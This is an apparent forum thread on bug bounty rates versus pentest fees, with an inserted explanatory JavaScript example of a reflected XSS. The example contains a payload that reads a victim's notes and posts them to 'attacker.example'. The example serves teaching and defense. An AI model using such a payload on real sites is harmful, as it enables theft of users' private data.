by justsomeuser 2115 days ago
I do not have the market rates for vulnerabilities, but I do know some pen testing companies charge $10,000 for a few days of work that may not return any concrete bugs.

Compared with hiring a pen testing team, offering high bounties seems like a bargain as you get actual exploits that would impact the company.


Yes, that is the premise behind bug bounties. If you're a vulnerability researcher with a track record, you will probably make better money and certainly more consistent money as a pentester. Many pentesters just do both.

I have, uh, some experience with the rates here.

Can I ask, if you were the owner of the popular note taking app, what bounty would you want to have paid for that vulnerability? I.e.:

"XSS bug in a popular note taking app ... attacker to download all the users notes just by having them visit a URL"

So as to not feel worried that future vulnerabilities would get sold on the black market instead.
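The vulnerability class quoted above (an XSS that lets an attacker read a victim's notes just by getting them to visit a URL) is easy to picture with a reflected-XSS sketch. The code below is an added illustration, not code from the note-taking app in question or from any commenter: the page renderer, the `/api/notes` endpoint, the `notes.example` and `attacker.example` hosts and the payload are all constructed for the example.

```javascript
// Added illustration of a reflected XSS of the kind the comment describes.
// Not code from any real note-taking app; the renderer, hosts, endpoint and
// payload below are hypothetical and constructed for this example.

// Minimal HTML-escaping helper used by the hardened renderer.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable: the "q" search parameter from the URL is concatenated straight
// into the page, so whatever the URL carries becomes live markup.
function renderSearchPageVulnerable(url) {
  const q = new URL(url).searchParams.get('q') ?? '';
  return `<h1>Results for: ${q}</h1>`;
}

// Hardened: same page, but the parameter is HTML-escaped first, so a payload
// is displayed as text rather than executed.
function renderSearchPageSafe(url) {
  const q = new URL(url).searchParams.get('q') ?? '';
  return `<h1>Results for: ${escapeHtml(q)}</h1>`;
}

// Constructed attacker payload. Once it runs in the victim's origin it can call
// the app's own (hypothetical) /api/notes endpoint with the victim's session
// cookies and forward the response to a host the attacker controls. This is
// why a single reflected XSS is enough to "download all the user's notes".
const PAYLOAD =
  `<img src=x onerror="fetch('/api/notes').then(r=>r.text()).then(t=>` +
  `fetch('https://attacker.example/collect',{method:'POST',body:t}))">`;

// The link the victim is asked to visit: the payload rides in the query string.
const ATTACK_URL =
  'https://notes.example/search?q=' + encodeURIComponent(PAYLOAD);

// Check whether a rendered page still contains the payload as live markup
// (i.e. an unescaped <img ... onerror=...> tag).
function containsLivePayload(html) {
  return html.includes('<img src=x onerror=');
}

// Render both versions for the same attacker URL so the difference is visible.
function demo() {
  return {
    vulnerable: renderSearchPageVulnerable(ATTACK_URL),
    safe: renderSearchPageSafe(ATTACK_URL),
  };
}
```

Running `demo()` shows the vulnerable page carrying the `<img onerror=...>` tag intact, while the hardened page renders it as `&lt;img src=x onerror=&quot;...`. Output encoding at the point of insertion is the fix; a Content-Security-Policy that disallows inline handlers would add a second layer, but is no substitute for escaping.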

XSS? Outside of a social network, where it can propagate itself? For a non-FAANG-scale company? Probably between $250 and $500, if it's a clean and effective XSS. Less if you have to interact with an obscure feature of the application.

Thanks for the reply; I would have guessed maybe 10x more.

Interesting to hear.

Makes me think that there is not any big market for exploits targeting smaller companies. Maybe such exploits (for smaller products) would be useful primarily for spear phishing, and not bring in so much money if sold, and be hard to find a buyer for?

Still, if the note taking app was something well known like Ev*rnote, I wish they'd pay more. (No idea if it was.)